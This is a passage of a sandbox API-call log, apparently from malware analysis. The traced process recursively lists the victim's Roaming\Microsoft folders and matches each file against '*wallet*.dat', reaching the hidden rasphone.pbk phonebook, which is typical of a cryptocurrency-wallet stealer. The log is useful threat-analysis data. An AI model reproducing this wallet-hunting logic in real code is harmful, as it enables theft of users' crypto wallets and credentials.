Explorer\\UserData\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.362] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.362] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.362] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.362] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.362] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0175.363] StrCmpCA (pszStr1="Low", pszStr2=".") returned 30 [0175.363] StrCmpCA (pszStr1="Low", pszStr2="..") returned 30 [0175.363] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 78 [0175.363] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\UserData", pszStr2="") returned 77 [0175.363] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\UserData\\Low") returned 40 [0175.363] PathMatchSpecA (pszFile="Low", pszSpec="*wallet*.dat") returned 0 [0175.363] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned 80 [0175.363] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196768, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x4ea8d0 [0175.363] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.363] FindNextFileA (in: hFindFile=0x4ea8d0, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196768, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0175.363] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.363] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.363] FindNextFileA (in: hFindFile=0x4ea8d0, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x196768, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 0 [0175.363] FindClose (in: hFindFile=0x4ea8d0 | out: hFindFile=0x4ea8d0) returned 1 [0175.363] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0175.363] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.363] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14e, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 0 [0175.364] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.364] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x14e, cFileName="MMC", cAlternateFileName="")) returned 1 [0175.364] StrCmpCA (pszStr1="MMC", pszStr2=".") returned 31 [0175.364] StrCmpCA (pszStr1="MMC", pszStr2="..") returned 31 [0175.364] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC") returned 51 [0175.364] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.364] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\MMC") returned 13 [0175.364] PathMatchSpecA (pszFile="MMC", pszSpec="*wallet*.dat") returned 0 [0175.364] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*") returned 53 [0175.364] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\mmc\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.366] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.366] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.366] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.366] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.366] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0175.366] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.366] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0175.366] StrCmpCA (pszStr1="Network", pszStr2=".") returned 32 [0175.366] StrCmpCA (pszStr1="Network", pszStr2="..") returned 32 [0175.366] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network") returned 55 [0175.366] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.366] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Network") returned 17 [0175.366] PathMatchSpecA (pszFile="Network", pszSpec="*wallet*.dat") returned 0 [0175.366] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*") returned 57 [0175.366] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.367] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.367] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.367] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.367] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.367] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0175.367] StrCmpCA (pszStr1="Connections", pszStr2=".") returned 21 [0175.367] StrCmpCA (pszStr1="Connections", pszStr2="..") returned 21 [0175.367] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 67 [0175.367] StrCmpCA (pszStr1="Microsoft\\Network", pszStr2="") returned 77 [0175.367] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections") returned 29 [0175.367] PathMatchSpecA (pszFile="Connections", pszSpec="*wallet*.dat") returned 0 [0175.367] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned 69 [0175.367] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\connections\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.368] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.368] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.368] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.368] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.368] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Pbk", cAlternateFileName="")) returned 1 [0175.368] StrCmpCA (pszStr1="Pbk", pszStr2=".") returned 34 [0175.368] StrCmpCA (pszStr1="Pbk", pszStr2="..") returned 34 [0175.368] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 71 [0175.368] StrCmpCA (pszStr1="Microsoft\\Network\\Connections", pszStr2="") returned 77 [0175.368] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk") returned 33 [0175.368] PathMatchSpecA (pszFile="Pbk", pszSpec="*wallet*.dat") returned 0 [0175.368] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned 73 [0175.368] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ea690 [0175.368] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.368] FindNextFileA (in: hFindFile=0x4ea690, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.368] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.368] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.368] FindNextFileA (in: hFindFile=0x4ea690, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0175.368] StrCmpCA (pszStr1="_hiddenPbk", pszStr2=".") returned 49 [0175.368] StrCmpCA (pszStr1="_hiddenPbk", pszStr2="..") returned 49 [0175.368] wsprintfA (in: param_1=0x19685c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 82 [0175.369] StrCmpCA (pszStr1="Microsoft\\Network\\Connections\\Pbk", pszStr2="") returned 77 [0175.369] wsprintfA (in: param_1=0x196964, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 44 [0175.369] PathMatchSpecA (pszFile="_hiddenPbk", pszSpec="*wallet*.dat") returned 0 [0175.369] wsprintfA (in: param_1=0x19652c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned 84 [0175.369] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\*"), lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ea650 [0175.369] FindNextFileA (in: hFindFile=0x4ea650, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.369] FindNextFileA (in: hFindFile=0x4ea650, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0175.369] wsprintfA (in: param_1=0x1961d4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0175.369] wsprintfA (in: param_1=0x1962dc, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 57 [0175.369] PathMatchSpecA (pszFile="rasphone.pbk", pszSpec="*wallet*.dat") returned 0 [0175.369] wsprintfA (in: param_1=0x195ea4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk\\*") returned 97 [0175.369] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x6f3fb46a, ftCreationTime.dwLowDateTime=0x1d7006c, ftCreationTime.dwHighDateTime=0x6f3fb46a, ftLastAccessTime.dwLowDateTime=0x1d7006c, ftLastAccessTime.dwHighDateTime=0x6f3fb46a, ftLastWriteTime.dwLowDateTime=0x1d7006c, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x610072, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0175.370] FindNextFileA (in: hFindFile=0x4ea650, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0175.370] FindClose (in: hFindFile=0x4ea650 | out: hFindFile=0x4ea650) returned 1 [0175.370] FindNextFileA (in: hFindFile=0x4ea690, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0175.370] FindClose (in: hFindFile=0x4ea690 | out: hFindFile=0x4ea690) returned 1 [0175.370] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Pbk", cAlternateFileName="")) returned 0 [0175.370] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.370] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0175.370] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.370] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0175.370] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office") returned 54 [0175.370] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Office") returned 16 [0175.370] PathMatchSpecA (pszFile="Office", pszSpec="*wallet*.dat") returned 0 [0175.370] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*") returned 56 [0175.370] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\*"), lpFindFileData=0x19777c | out: 